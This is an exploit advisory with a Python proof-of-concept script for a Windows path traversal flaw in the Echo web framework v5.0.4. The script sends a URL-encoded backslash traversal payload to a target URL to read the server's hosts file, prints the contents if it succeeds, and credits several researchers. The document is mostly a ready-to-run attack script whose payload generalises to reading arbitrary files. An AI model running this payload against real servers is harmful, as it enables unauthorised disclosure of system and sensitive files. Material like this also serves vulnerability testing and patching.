=============================================================================================================================================
| # Title     : Echo Framework v5.0.4 Windows Path Traversal Vulnerability Scanner (Hosts File Test)                                        |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
| # Vendor    : https://github.com/labstack/echo                                                                                            |
=============================================================================================================================================

[+] Summary    : This Python script is a security testing tool designed to detect a Path Traversal vulnerability in web applications built with the Echo framework (version 5) running on Windows systems.
                  
The script attempts to bypass improper path sanitization by sending a crafted URL-encoded backslash payload (%5c) to traverse directories and access the sensitive Windows file:

C:\Windows\System32\drivers\etc\hosts

If the server improperly validates user-controlled file paths, it may return the contents of the hosts file. The script then checks the HTTP response for known indicators such as "localhost" and "Microsoft Corp" to determine whether the target is vulnerable.

The scanner uses:

URL encoding to bypass filtering mechanisms

A direct HTTP GET request via the requests library

Simple content-based detection logic

[+] POC   :  

import requests
import argparse

def check_vulnerability(url):

    payload = "/..%5c..%5c..%5c..%5c..%5c..%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts"
    
    target_url = url.rstrip('/') + payload
    
    print(f"[*] Testing target: {url}")
    print(f"[*] Sending payload: {payload}")
    
    try:

        response = requests.get(target_url, verify=False, timeout=10)

        if "localhost" in response.text and "Microsoft Corp" in response.text:
            print("[+] Target is VULNERABLE!")
            print("[+] Content of C:\\Windows\\System32\\drivers\\etc\\hosts:\n")
            print(response.text)
        else:
            print("[-] Target does not seem vulnerable or file not found.")
            print(f"[*] Status Code: {response.status_code}")
            
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":

    parser = argparse.ArgumentParser(description="Echo Framework v5 Path Traversal (Windows) Exploit")
    parser.add_argument("-u", "--url", help="Target URL (e.g., http://localhost:1323)", required=True)
    
    args = parser.parse_args()
    check_vulnerability(args.url)
	
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================